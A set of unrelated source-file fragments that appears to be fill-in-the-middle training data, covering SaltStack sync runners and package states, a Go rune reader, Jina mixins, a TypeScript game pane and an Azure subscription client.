return salt.utils.extmods.sync(__opts__, 'runners', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_wheel(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync wheel modules from ``salt://_wheel`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_wheel
'''
return salt.utils.extmods.sync(__opts__, 'wheel', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_engines(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync engines from ``salt://_engines`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_engines
'''
return salt.utils.extmods.sync(__opts__, 'engines', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_thorium(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2018.3.0
Sync Thorium from ``salt://_thorium`` to the master
saltenv: ``base``
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist
comma-separated list of modules to sync
extmod_blacklist
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_thorium
'''
return salt.utils.extmods.sync(__opts__, 'thorium', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_queues(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync queue modules from ``salt://_queues`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_queues
'''
return salt.utils.extmods.sync(__opts__, 'queues', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_pillar(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync pillar modules from ``salt://_pillar`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_pillar
'''
return salt.utils.extmods.sync(__opts__, 'pillar', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_utils(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2016.11.0
Sync utils modules from ``salt://_utils`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_utils
'''
return salt.utils.extmods.sync(__opts__, 'utils', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_sdb(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync sdb modules from ``salt://_sdb`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_sdb
'''
return salt.utils.extmods.sync(__opts__, 'sdb', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_tops(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2016.3.7,2016.11.4,2017.7.0
Sync master_tops modules from ``salt://_tops`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_tops
'''
return salt.utils.extmods.sync(__opts__, 'tops', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_cache(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync cache modules from ``salt://_cache`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_cache
'''
return salt.utils.extmods.sync(__opts__, 'cache', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_fileserver(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2018.3.0
Sync fileserver modules from ``salt://_fileserver`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_fileserver
'''
return salt.utils.extmods.sync(__opts__, 'fileserver', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_clouds(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync cloud modules from ``salt://_clouds`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_clouds
'''
return salt.utils.extmods.sync(__opts__, 'clouds', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_roster(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync roster modules from ``salt://_roster`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_roster
'''
return salt.utils.extmods.sync(__opts__, 'roster', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_eauth_tokens(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2018.3.0
Sync eauth token modules from ``salt://_tokens`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_eauth_tokens
'''
return salt.utils.extmods.sync(__opts__, 'tokens', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_serializers(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2019.2.0
Sync serializer modules from ``salt://_serializers`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_utils
'''
return salt.utils.extmods.sync(__opts__, 'serializers', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_executors(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2019.2.1
Sync executor modules from ``salt://_executors`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-seperated list of modules to sync
extmod_blacklist : None
comma-seperated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_executors
'''
return salt.utils.extmods.sync(__opts__, 'executors', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0] |
def sync_all(saltenv='base', extmod_whitelist=None, extmod_blacklist=None): |
reader.go | package library
import (
"bufio"
"io"
"log"
)
// LoopRule signals to ReadRunes if it must continue or stop
type LoopRule bool
const (
// Break ReadRunes stops on condition defined by algorithm
Break LoopRule = false
// Continue ReadRunes continues reading the runes
Continue LoopRule = true
)
// ReadRunes reads the runes from the instructions reader and applies algorithm on the context interface
func ReadRunes(instructions io.Reader, context interface{}, algorithm func(c rune, context interface{}) LoopRule) {
r := bufio.NewReader(instructions)
for {
if c, _, err := r.ReadRune(); err != nil {
if err == io.EOF {
break
} else {
log.Fatal(err)
}
} else {
signal := algorithm(c, context)
if signal == Break |
}
}
}
| {
break
} |
mixin.py | from ..arrays import DocumentArray
from ...proto import jina_pb2
class DocsPropertyMixin:
"""Mixin class of docs property."""
@property
def docs(self) -> 'DocumentArray':
"""Get the :class: `DocumentArray` with sequence `body.docs` as content.
:return: requested :class: `DocumentArray`
"""
self.is_used = True
return DocumentArray(self.body.docs)
class GroundtruthPropertyMixin:
"""Mixin class of groundtruths property."""
@property
def groundtruths(self) -> 'DocumentArray':
"""Get the groundtruths in :class: `DocumentArray` type.
:return: requested groundtruths :class: `DocumentArray`
"""
self.is_used = True
return DocumentArray(self.body.groundtruths)
class IdsMixin:
"""Mixin class of ids property."""
@property
def ids(self):
"""Get the ids.
:return: ids
"""
return self.body.ids
class CommandMixin:
| """Mixin class of command property."""
@property
def command(self) -> str:
"""Get the command.
:return: command
"""
self.is_used = True
return jina_pb2.RequestProto.ControlRequestProto.Command.Name(
self.proto.control.command
) |
|
pane.ts | import { Immutable } from "src/utils";
import { Viseur } from "src/viseur";
import { BasePane, IPaneStat } from "src/viseur/game";
import { Game } from "./game";
import { IGameState, IPlayerState } from "./state-interfaces";
// <<-- Creer-Merge: imports -->>
// Add additional imports you need here
// <<-- /Creer-Merge: imports -->>
/**
* The visual pane that is displayed below the game and has text elements for
* each player
*/
export class | extends BasePane<IGameState, IPlayerState> {
// <<-- Creer-Merge: variables -->>
// if you need add more member class variables, do so here
// <<-- /Creer-Merge: variables -->>
/**
* Creates the pane for the Stardash game.
*
* @param viseur - The Viseur instance controlling the pane.
* @param game - The game this pane is displaying stats for.
* @param state - The initial state of the game.
*/
constructor(viseur: Viseur, game: Game, state: Immutable<IGameState>) {
super(viseur, game, state);
// <<-- Creer-Merge: constructor -->>
// constructor your pane here
// <<-- /Creer-Merge: constructor -->>
}
// <<-- Creer-Merge: public-functions -->>
// If you want to add more public functions, do so here
// <<-- /Creer-Merge: public-functions -->>
/**
* Gets the stats for the players score bars.
*
* @param state - The current(most) state of the game to update this pane for.
* @returns An array of numbers, where each index is the player at that
* index. Sum does not matter, it will resize dynamically. If You want
* to display no score, return undefined.
* An array of numbers is treated as a full bar display.
* An array of number tuples is treated as individual bars alternatively
* left and right aligned scaling from the first to the max second value.
*/
protected getPlayersScores(state: Immutable<IGameState>): Array<[number, number]> | number[] | undefined {
super.getPlayersScores(state);
// <<-- Creer-Merge: get-player-scores -->>
return state.players.map((p) => p.victoryPoints);
// <<-- /Creer-Merge: get-player-scores -->>
}
/**
* Gets the stats to show on the top bar of the pane,
* which tracks stats in the game.
* This is only called once, during initialization.
* @param state the initial state of the game
* @returns All the PaneStats to display on this BasePane for the game.
*/
protected getGameStats(state: Immutable<IGameState>): Array<IPaneStat<IGameState>> {
const stats = super.getGameStats(state);
// <<-- Creer-Merge: game-stats -->>
// add stats for games to show up here
// <<-- /Creer-Merge: game-stats -->>
return stats;
}
/**
* Gets the stats to show on each player pane, which tracks stats for that player
* @param state the initial state of the game
* @returns All the PaneStats to display on this BasePane for the player.
*/
protected getPlayerStats(state: Immutable<IGameState>): Array<IPaneStat<IPlayerState>> {
const stats = super.getPlayerStats(state);
// <<-- Creer-Merge: player-stats -->>
// add stats for players to show up here
stats.push(
{
title: "Mythicite",
icon: "diamond",
get: (player) => player.victoryPoints,
},
);
stats.push(
{
title: "Money",
icon: "money",
get: (player) => player.money,
},
);
// <<-- /Creer-Merge: player-stats -->>
return stats;
}
// <<-- Creer-Merge: functions -->>
// add more functions for your pane here
// <<-- /Creer-Merge: functions -->>
}
| Pane |
subscription.go | package subscription
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"context"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/tracing"
"net/http"
)
// Client is the the subscription client
type Client struct {
BaseClient
}
// NewClient creates an instance of the Client client.
func | () Client {
return NewClientWithBaseURI(DefaultBaseURI)
}
// NewClientWithBaseURI creates an instance of the Client client using a custom endpoint. Use this when interacting
// with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure stack).
func NewClientWithBaseURI(baseURI string) Client {
return Client{NewWithBaseURI(baseURI)}
}
// Cancel the operation to cancel a subscription
// Parameters:
// subscriptionID - subscription Id.
func (client Client) Cancel(ctx context.Context, subscriptionID string) (result CanceledSubscriptionID, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/Client.Cancel")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.CancelPreparer(ctx, subscriptionID)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Cancel", nil, "Failure preparing request")
return
}
resp, err := client.CancelSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "subscription.Client", "Cancel", resp, "Failure sending request")
return
}
result, err = client.CancelResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Cancel", resp, "Failure responding to request")
return
}
return
}
// CancelPreparer prepares the Cancel request.
func (client Client) CancelPreparer(ctx context.Context, subscriptionID string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", subscriptionID),
}
const APIVersion = "2020-09-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Subscription/cancel", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// CancelSender sends the Cancel request. The method will close the
// http.Response Body if it receives an error.
func (client Client) CancelSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// CancelResponder handles the response to the Cancel request. The method always
// closes the http.Response Body.
func (client Client) CancelResponder(resp *http.Response) (result CanceledSubscriptionID, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// Enable the operation to enable a subscription
// Parameters:
// subscriptionID - subscription Id.
func (client Client) Enable(ctx context.Context, subscriptionID string) (result EnabledSubscriptionID, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/Client.Enable")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.EnablePreparer(ctx, subscriptionID)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Enable", nil, "Failure preparing request")
return
}
resp, err := client.EnableSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "subscription.Client", "Enable", resp, "Failure sending request")
return
}
result, err = client.EnableResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Enable", resp, "Failure responding to request")
return
}
return
}
// EnablePreparer prepares the Enable request.
func (client Client) EnablePreparer(ctx context.Context, subscriptionID string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", subscriptionID),
}
const APIVersion = "2020-09-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Subscription/enable", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// EnableSender sends the Enable request. The method will close the
// http.Response Body if it receives an error.
func (client Client) EnableSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// EnableResponder handles the response to the Enable request. The method always
// closes the http.Response Body.
func (client Client) EnableResponder(resp *http.Response) (result EnabledSubscriptionID, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// Rename the operation to rename a subscription
// Parameters:
// subscriptionID - subscription Id.
// body - subscription Name
func (client Client) Rename(ctx context.Context, subscriptionID string, body Name) (result RenamedSubscriptionID, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/Client.Rename")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.RenamePreparer(ctx, subscriptionID, body)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Rename", nil, "Failure preparing request")
return
}
resp, err := client.RenameSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "subscription.Client", "Rename", resp, "Failure sending request")
return
}
result, err = client.RenameResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Rename", resp, "Failure responding to request")
return
}
return
}
// RenamePreparer prepares the Rename request.
func (client Client) RenamePreparer(ctx context.Context, subscriptionID string, body Name) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", subscriptionID),
}
const APIVersion = "2020-09-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsContentType("application/json; charset=utf-8"),
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Subscription/rename", pathParameters),
autorest.WithJSON(body),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// RenameSender sends the Rename request. The method will close the
// http.Response Body if it receives an error.
func (client Client) RenameSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// RenameResponder handles the response to the Rename request. The method always
// closes the http.Response Body.
func (client Client) RenameResponder(resp *http.Response) (result RenamedSubscriptionID, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
| NewClient |
pkg.py | """
Installation of packages using OS package managers such as yum or apt-get
=========================================================================
.. note::
On minions running systemd>=205, as of version 2015.8.12, 2016.3.3, and
2016.11.0, `systemd-run(1)`_ is now used to isolate commands which modify
installed packages from the ``salt-minion`` daemon's control group. This is
done to keep systemd from killing the package manager commands spawned by
Salt, when Salt updates itself (see ``KillMode`` in the `systemd.kill(5)`_
manpage for more information). If desired, usage of `systemd-run(1)`_ can
be suppressed by setting a :mod:`config option <salt.modules.config.get>`
called ``systemd.use_scope``, with a value of ``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
Salt can manage software packages via the pkg state module, packages can be
set up to be installed, latest, removed and purged. Package management
declarations are typically rather simple:
.. code-block:: yaml
vim:
pkg.installed
A more involved example involves pulling from a custom repository.
.. code-block:: yaml
base:
pkgrepo.managed:
- name: ppa:wolfnet/logstash
- dist: precise
- file: /etc/apt/sources.list.d/logstash.list
- keyid: 28B04E4A
- keyserver: keyserver.ubuntu.com
logstash:
pkg.installed:
- fromrepo: ppa:wolfnet/logstash
Multiple packages can also be installed with the use of the pkgs
state module
.. code-block:: yaml
dotdeb.repo:
pkgrepo.managed:
- name: deb http://packages.dotdeb.org wheezy-php55 all
- dist: wheezy-php55
- file: /etc/apt/sources.list.d/dotbeb.list
- keyid: 89DF5277
- keyserver: keys.gnupg.net
- refresh_db: true
php.packages:
pkg.installed:
- fromrepo: wheezy-php55
- pkgs:
- php5-fpm
- php5-cli
- php5-curl
.. warning::
Package names are currently case-sensitive. If the minion is using a
package manager which is not case-sensitive (such as :mod:`pkgng
<salt.modules.pkgng>`), then this state will fail if the proper case is not
used. This will be addressed in a future release of Salt.
"""
import fnmatch
import logging
import os
import re
import salt.utils.pkg
import salt.utils.platform
import salt.utils.versions
from salt.exceptions import CommandExecutionError, MinionError, SaltInvocationError
from salt.modules.pkg_resource import _repack_pkgs
from salt.output import nested
from salt.utils.functools import namespaced_function as _namespaced_function
from salt.utils.odict import OrderedDict as _OrderedDict
# pylint: disable=invalid-name
_repack_pkgs = _namespaced_function(_repack_pkgs, globals())
if salt.utils.platform.is_windows():
# pylint: disable=import-error,no-name-in-module,unused-import
from urllib.parse import urlparse as _urlparse
from salt.exceptions import SaltRenderError
import collections
import datetime
import errno
import time
from functools import cmp_to_key
# pylint: disable=import-error
# pylint: enable=unused-import
from salt.modules.win_pkg import _get_package_info
from salt.modules.win_pkg import get_repo_data
from salt.modules.win_pkg import _get_repo_details
from salt.modules.win_pkg import _refresh_db_conditional
from salt.modules.win_pkg import refresh_db
from salt.modules.win_pkg import genrepo
from salt.modules.win_pkg import _repo_process_pkg_sls
from salt.modules.win_pkg import _get_latest_pkg_version
from salt.modules.win_pkg import _reverse_cmp_pkg_versions
_get_package_info = _namespaced_function(_get_package_info, globals())
get_repo_data = _namespaced_function(get_repo_data, globals())
_get_repo_details = _namespaced_function(_get_repo_details, globals())
_refresh_db_conditional = _namespaced_function(_refresh_db_conditional, globals())
refresh_db = _namespaced_function(refresh_db, globals())
genrepo = _namespaced_function(genrepo, globals())
_repo_process_pkg_sls = _namespaced_function(_repo_process_pkg_sls, globals())
_get_latest_pkg_version = _namespaced_function(_get_latest_pkg_version, globals())
_reverse_cmp_pkg_versions = _namespaced_function(
_reverse_cmp_pkg_versions, globals()
)
# The following imports are used by the namespaced win_pkg funcs
# and need to be included in their globals.
# pylint: disable=import-error,unused-import
import salt.utils.msgpack as msgpack
from salt.utils.versions import LooseVersion
# pylint: enable=import-error,unused-import
# pylint: enable=invalid-name
log = logging.getLogger(__name__)
def __virtual__():
"""
Only make these states available if a pkg provider has been detected or
assigned for this minion
"""
if "pkg.install" in __salt__:
return True
return (False, "pkg module could not be loaded")
def _get_comparison_spec(pkgver):
"""
Return a tuple containing the comparison operator and the version. If no
comparison operator was passed, the comparison is assumed to be an "equals"
comparison, and "==" will be the operator returned.
"""
oper, verstr = salt.utils.pkg.split_comparison(pkgver.strip())
if oper in ("=", ""):
oper = "=="
return oper, verstr
def _check_ignore_epoch(oper, desired_version, ignore_epoch=None):
"""
Conditionally ignore epoch, but only under all of the following
circumstances:
1. No value for ignore_epoch passed to state
2. desired_version has no epoch
3. oper does not contain a "<" or ">"
"""
if ignore_epoch is not None:
return ignore_epoch
return "<" not in oper and ">" not in oper and ":" not in desired_version
def _parse_version_string(version_conditions_string):
"""
Returns a list of two-tuples containing (operator, version).
"""
result = []
version_conditions_string = version_conditions_string.strip()
if not version_conditions_string:
return result
for version_condition in version_conditions_string.split(","):
operator_and_version = _get_comparison_spec(version_condition)
result.append(operator_and_version)
return result
def _fulfills_version_string(
installed_versions,
version_conditions_string,
ignore_epoch=None,
allow_updates=False,
):
"""
Returns True if any of the installed versions match the specified version conditions,
otherwise returns False.
installed_versions
The installed versions
version_conditions_string
The string containing all version conditions. E.G.
1.2.3-4
>=1.2.3-4
>=1.2.3-4, <2.3.4-5
>=1.2.3-4, <2.3.4-5, !=1.2.4-1
ignore_epoch : None
When a package version contains an non-zero epoch (e.g.
``1:3.14.159-2.el7``), and a specific version of a package is desired,
set this option to ``True`` to ignore the epoch when comparing
versions.
.. versionchanged:: 3001
If no value for this argument is passed to the state that calls
this helper function, and ``version_conditions_string`` contains no
epoch or greater-than/less-than, then the epoch will be ignored.
allow_updates : False
Allow the package to be updated outside Salt's control (e.g. auto updates on Windows).
This means a package on the Minion can have a newer version than the latest available in
the repository without enforcing a re-installation of the package.
(Only applicable if only one strict version condition is specified E.G. version: 2.0.6~ubuntu3)
"""
version_conditions = _parse_version_string(version_conditions_string)
for installed_version in installed_versions:
fullfills_all = True
for operator, version_string in version_conditions:
if allow_updates and len(version_conditions) == 1 and operator == "==":
operator = ">="
fullfills_all = fullfills_all and _fulfills_version_spec(
[installed_version], operator, version_string, ignore_epoch=ignore_epoch
)
if fullfills_all:
return True
return False
def _fulfills_version_spec(versions, oper, desired_version, ignore_epoch=None):
"""
Returns True if any of the installed versions match the specified version,
otherwise returns False
"""
cmp_func = __salt__.get("pkg.version_cmp")
# stripping "with_origin" dict wrapper
if salt.utils.platform.is_freebsd():
if isinstance(versions, dict) and "version" in versions:
versions = versions["version"]
for ver in versions:
if (
oper == "==" and fnmatch.fnmatch(ver, desired_version)
) or salt.utils.versions.compare(
ver1=ver,
oper=oper,
ver2=desired_version,
cmp_func=cmp_func,
ignore_epoch=_check_ignore_epoch(oper, desired_version, ignore_epoch),
):
return True
return False
def _find_unpurge_targets(desired, **kwargs):
"""
Find packages which are marked to be purged but can't yet be removed
because they are dependencies for other installed packages. These are the
packages which will need to be 'unpurged' because they are part of
pkg.installed states. This really just applies to Debian-based Linuxes.
"""
return [
x
for x in desired
if x in __salt__["pkg.list_pkgs"](purge_desired=True, **kwargs)
]
def _find_download_targets(
name=None,
version=None,
pkgs=None,
normalize=True,
skip_suggestions=False,
ignore_epoch=None,
**kwargs
):
"""
Inspect the arguments to pkg.downloaded and discover what packages need to
be downloaded. Return a dict of packages to download.
"""
cur_pkgs = __salt__["pkg.list_downloaded"](**kwargs)
if pkgs:
# pylint: disable=not-callable
to_download = _repack_pkgs(pkgs, normalize=normalize)
# pylint: enable=not-callable
if not to_download:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalidly formatted pkgs parameter. See minion log.",
}
else:
if normalize:
_normalize_name = __salt__.get(
"pkg.normalize_name", lambda pkgname: pkgname
)
to_download = {_normalize_name(name): version}
else:
to_download = {name: version}
cver = cur_pkgs.get(name, {})
if name in to_download:
# Package already downloaded, no need to download again
if cver and version in cver:
return {
"name": name,
"changes": {},
"result": True,
"comment": (
"Version {} of package '{}' is already downloaded".format(
version, name
)
),
}
# if cver is not an empty string, the package is already downloaded
elif cver and version is None:
# The package is downloaded
return {
"name": name,
"changes": {},
"result": True,
"comment": "Package {} is already downloaded".format(name),
}
version_spec = False
if not skip_suggestions:
try:
problems = _preflight_check(to_download, **kwargs)
except CommandExecutionError:
pass
else:
comments = []
if problems.get("no_suggest"):
comments.append(
"The following package(s) were not found, and no "
"possible matches were found in the package db: "
"{}".format(", ".join(sorted(problems["no_suggest"])))
)
if problems.get("suggest"):
for pkgname, suggestions in problems["suggest"].items():
comments.append(
"Package '{}' not found (possible matches: {})".format(
pkgname, ", ".join(suggestions)
)
)
if comments:
if len(comments) > 1:
comments.append("")
return {
"name": name,
"changes": {},
"result": False,
"comment": ". ".join(comments).rstrip(),
}
# Find out which packages will be targeted in the call to pkg.download
# Check current downloaded versions against specified versions
targets = {}
problems = []
for pkgname, pkgver in to_download.items():
cver = cur_pkgs.get(pkgname, {})
# Package not yet downloaded, so add to targets
if not cver:
targets[pkgname] = pkgver
continue
# No version specified but package is already downloaded
elif cver and not pkgver:
continue
version_spec = True
try:
if not _fulfills_version_string(
cver.keys(), pkgver, ignore_epoch=ignore_epoch
):
targets[pkgname] = pkgver
except CommandExecutionError as exc:
problems.append(exc.strerror)
continue
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if not targets:
# All specified packages are already downloaded
msg = "All specified packages{} are already downloaded".format(
" (matching specified versions)" if version_spec else ""
)
return {"name": name, "changes": {}, "result": True, "comment": msg}
return targets
def _find_advisory_targets(name=None, advisory_ids=None, **kwargs):
"""
Inspect the arguments to pkg.patch_installed and discover what advisory
patches need to be installed. Return a dict of advisory patches to install.
"""
cur_patches = __salt__["pkg.list_installed_patches"](**kwargs)
if advisory_ids:
to_download = advisory_ids
else:
to_download = [name]
if cur_patches.get(name, {}):
# Advisory patch already installed, no need to install it again
return {
"name": name,
"changes": {},
"result": True,
"comment": "Advisory patch {} is already installed".format(name),
}
# Find out which advisory patches will be targeted in the call to pkg.install
targets = []
